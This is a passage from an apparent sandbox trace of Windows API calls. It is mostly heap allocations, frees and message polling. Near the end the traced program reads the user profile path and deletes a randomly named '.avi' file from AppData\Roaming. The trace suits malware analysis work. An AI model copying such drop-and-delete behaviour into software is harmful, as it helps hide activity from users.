(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0225.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0225.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0225.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0225.863] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0225.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0225.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0225.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0225.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0225.863] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0225.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0225.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0225.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0225.864] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0225.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0225.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0225.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0225.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0225.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0225.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0225.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0225.864] FreeLibrary (hLibModule=0x756e0000) returned 1 [0225.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0225.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0225.864] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0225.864] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0225.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0225.864] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0225.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0225.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0225.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0225.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0225.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0225.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0225.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0225.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0225.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0225.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0225.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0225.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0225.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0225.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0225.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0225.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0225.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0225.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0225.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0225.865] CloseHandle (hObject=0x2a0) returned 1 [0225.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0225.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0225.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0225.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0225.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0225.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0225.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0225.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0225.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0225.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0225.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0225.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0225.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0225.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0225.867] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0225.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0225.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0225.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0225.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0225.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0225.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0225.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0225.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0225.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0225.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0225.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0225.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0225.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0225.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0225.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0225.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0225.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0225.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0225.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0225.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0225.867] CloseHandle (hObject=0x2d0) returned 1 [0225.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0225.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0225.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0225.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0225.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0225.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0225.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0225.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0225.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0225.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0225.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0225.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0225.869] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0225.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0225.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0225.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0225.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0225.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0225.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0225.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0225.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0225.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0225.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0225.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0225.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0225.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0225.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0225.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0225.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0225.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0225.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0225.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0225.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0225.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0225.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0225.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0225.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0225.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0225.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0225.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0225.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0225.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0225.873] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0225.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0225.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0225.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0225.873] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0225.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0225.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0225.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0225.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0225.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0225.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0225.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0225.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0225.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0225.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0225.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0225.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0225.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0225.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0225.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0225.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0225.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x58) returned 0x2e564e0 [0225.874] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/bfVxZ90.avi", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\bfVxZ90.avi", lpFilePart=0x8cedf4*="bfVxZ90.avi") returned 0x2b [0225.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0225.874] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\bfVxZ90.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\bfvxz90.avi")) returned 0x20 [0225.874] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\bfVxZ90.avi", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9914c70, ftCreationTime.dwHighDateTime=0x1d5e76a, ftLastAccessTime.dwLowDateTime=0xcfd04670, ftLastAccessTime.dwHighDateTime=0x1d5f054, ftLastWriteTime.dwLowDateTime=0xcfd04670, ftLastWriteTime.dwHighDateTime=0x1d5f054, nFileSizeHigh=0x0, nFileSizeLow=0x2317, dwReserved0=0x1, dwReserved1=0x1c, cFileName="bfVxZ90.avi", cAlternateFileName="")) returned 0xa87250 [0225.874] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\bfVxZ90.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\bfvxz90.avi")) returned 1 [0225.917] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9914c70, ftCreationTime.dwHighDateTime=0x1d5e76a, ftLastAccessTime.dwLowDateTime=0xcfd04670, ftLastAccessTime.dwHighDateTime=0x1d5f054, ftLastWriteTime.dwLowDateTime=0xcfd04670, ftLastWriteTime.dwHighDateTime=0x1d5f054, nFileSizeHigh=0x0, nFileSizeLow=0x2317, dwReserved0=0x1, dwReserved1=0x1c, cFileName="bfVxZ90.avi", cAlternateFileName="")) returned 0 [0225.918] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0225.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0225.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0225.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0225.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0225.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0225.918] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0225.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0225.919] 